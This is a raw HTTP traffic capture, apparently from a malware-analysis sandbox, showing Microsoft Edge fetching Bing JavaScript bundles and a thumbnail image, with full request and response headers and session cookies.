report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=84599
expires: Thu, 05 Dec 2024 09:38:59 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe80d
timing-allow-origin: *
GET

https://r.bing.com/rp/9Fqz5Ex6jCtgxHZiTZCH48EoBds.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/9Fqz5Ex6jCtgxHZiTZCH48EoBds.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:42:33 GMT
etag: 0x8DCEC88590A49A7
content-length: 1737
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ADAJbopPIaunlKI/GZphBw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 09cb5eef-201e-0006-66d0-1e1de8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.ad777b5c.1731626667.7b98387
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=124236
expires: Thu, 05 Dec 2024 20:39:36 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe808
timing-allow-origin: *
GET

https://r.bing.com/rp/qY42f0yZJzcOD6Gr6zubromZGRk.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/qY42f0yZJzcOD6Gr6zubromZGRk.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:39:44 GMT
etag: 0x8DCDC63AD1835BA
content-length: 292
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: VajXBkM/3bTyIROS16fUYg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cfa74880-001e-0055-36ea-1801e7000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=381195
expires: Sun, 08 Dec 2024 20:02:15 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe81e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/0bfPi56ofkEw3gzdSRo8zF649m4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/0bfPi56ofkEw3gzdSRo8zF649m4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:07:47 GMT
etag: 0x8DCDC5F365A1AB8
content-length: 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: xGpjcATT83Cyo4MSw4SamQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 448b9b60-901e-0014-7637-1629f4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=164774
expires: Fri, 06 Dec 2024 07:55:14 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe803
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/6juFsmmZTw2skj7CvpgreXtsgqM.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/6juFsmmZTw2skj7CvpgreXtsgqM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Thu, 10 Oct 2024 00:28:43 GMT
etag: 0x8DCE8C27F2A50EA
content-length: 4327
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: pjiAwJyioVvONH2doWdScQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8648badc-c01e-0043-6373-2bc079000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=351120
expires: Sun, 08 Dec 2024 11:41:00 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe81d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/P3JcGPiznvFTQHPH6lDPETmCcW0.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/P3JcGPiznvFTQHPH6lDPETmCcW0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:06:02 GMT
etag: 0x8DCDC675996C0F4
content-type: text/javascript; charset=utf-8
content-md5: 3Tj2RpIK8rOoXP8XXxZasg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e86ad052-701e-0051-48da-16f465000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1828
cache-control: public, no-transform, max-age=177547
expires: Fri, 06 Dec 2024 11:28:07 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe804
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/b1KIElS8CoqVTHRuF5IaPe1_xYo.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/b1KIElS8CoqVTHRuF5IaPe1_xYo.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:57:43 GMT
etag: 0x8DCDC5DCE643BD1
content-length: 1127
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: CnBe2qUSynWF62FiKAsEfg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: e84c8f2f-001e-0077-4405-176fd1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=163755
expires: Fri, 06 Dec 2024 07:38:15 GMT
date: Wed, 04 Dec 2024 10:09:00 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306940.1afe805
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/1Jz2vFBGshGz47SHAQMwptTnpB0.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/1Jz2vFBGshGz47SHAQMwptTnpB0.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:30:41 GMT
etag: 0x8DCEC86B0CE8A0B
content-length: 328
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 15JqyZBsCgkATXocOIdHMw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cae10e54-701e-003c-20be-205e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=47170
expires: Wed, 04 Dec 2024 23:15:26 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035bd
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Cah4LahmcqZwMC9LQrNkz-q8yNA.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/Cah4LahmcqZwMC9LQrNkz-q8yNA.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:00:08 GMT
etag: 0x8DCDC5E250561B1
content-length: 476
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: dIetyGvEY3rWVcsphG5z6g==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 733b1564-701e-003c-45be-165e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=386605
expires: Sun, 08 Dec 2024 21:32:41 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035be
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/7q76z2PhZYQSlMklnpUZ4ZrWoeg.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/7q76z2PhZYQSlMklnpUZ4ZrWoeg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:16:07 GMT
etag: 0x8DCDC6060BC5610
content-length: 247
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: pDodX6p5WFhmpgGbyxGATg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 43d0dd0d-401e-0016-2cd2-152b0e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=420294
expires: Mon, 09 Dec 2024 06:54:10 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035c0
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/MnlneN-7se6Sb8r2rU60mRHbccg.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/MnlneN-7se6Sb8r2rU60mRHbccg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 05:52:30 GMT
etag: 0x8DCDC5D13CD0771
content-length: 310
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: L5ADL4PV6f4x84onM+3pfQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3f330063-901e-0072-7fe6-159bae000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=225350
expires: Sat, 07 Dec 2024 00:45:06 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035bf
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/HqDsKR6xyRoUSYXXRfEdLVt772I.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/HqDsKR6xyRoUSYXXRfEdLVt772I.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 06:08:01 GMT
etag: 0x8DCDC5F3F15CCC5
content-length: 304
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: PX2MCYqpUzo58j8uZ/WgUQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 04108e64-601e-000a-1875-17f319000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=103092
expires: Thu, 05 Dec 2024 14:47:28 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035c8
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/u2MYL4Uj-EK9FdZPToQOipi2q40.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/u2MYL4Uj-EK9FdZPToQOipi2q40.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:08:12 GMT
etag: 0x8DCDC67A73161B2
content-type: text/javascript; charset=utf-8
content-md5: rEFXJrf0kyk8MofTblrrHg==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 15e28938-101e-0063-550e-16acb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 517
cache-control: public, no-transform, max-age=322485
expires: Sun, 08 Dec 2024 03:44:01 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035c9
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/0Zx9K_G7M4aiCGYMKlWyToXUgL4.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/0Zx9K_G7M4aiCGYMKlWyToXUgL4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Mon, 14 Oct 2024 19:28:47 GMT
etag: 0x8DCEC866CA9CA41
content-length: 293
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 5FutdZ9pAOltv8jfNxKE3A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 278faa1f-501e-0020-0bbe-20865c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=233174
expires: Sat, 07 Dec 2024 02:55:30 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035ca
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/qFV8REKe2pPY9NqiNskjmDxjgdc.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/qFV8REKe2pPY9NqiNskjmDxjgdc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:04:52 GMT
etag: 0x8DCDC672FE75D26
content-type: text/javascript; charset=utf-8
content-md5: JYNnUW1D/Qe7hGsFi8+mBQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 49b287de-b01e-0065-7294-165bcd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 437
cache-control: public, no-transform, max-age=361979
expires: Sun, 08 Dec 2024 14:42:15 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035cc
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/rbBaKhtkLVke-4PIWp9e6AV5_kg.br.js

msedge.exe

Remote address:

88.221.135.41:443

Request

GET /rp/rbBaKhtkLVke-4PIWp9e6AV5_kg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

last-modified: Tue, 24 Sep 2024 07:02:23 GMT
etag: 0x8DCDC66D6FEC879
content-length: 1092
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: v56DnyZo0+Ho77B8f6GoyA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2973d9c3-e01e-0010-454d-16dc76000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=431561
expires: Mon, 09 Dec 2024 10:01:57 GMT
date: Wed, 04 Dec 2024 10:09:16 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.c68f655f.1733306956.1b035cb
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://th.bing.com/th?id=OLC.Vk3w7EWg3TVA+Q480x360&w=12&h=12&o=6&dpr=2&pid=local

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OLC.Vk3w7EWg3TVA+Q480x360&w=12&h=12&o=6&dpr=2&pid=local HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1213
cache-control: public, max-age=961113
date: Wed, 04 Dec 2024 10:08:13 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
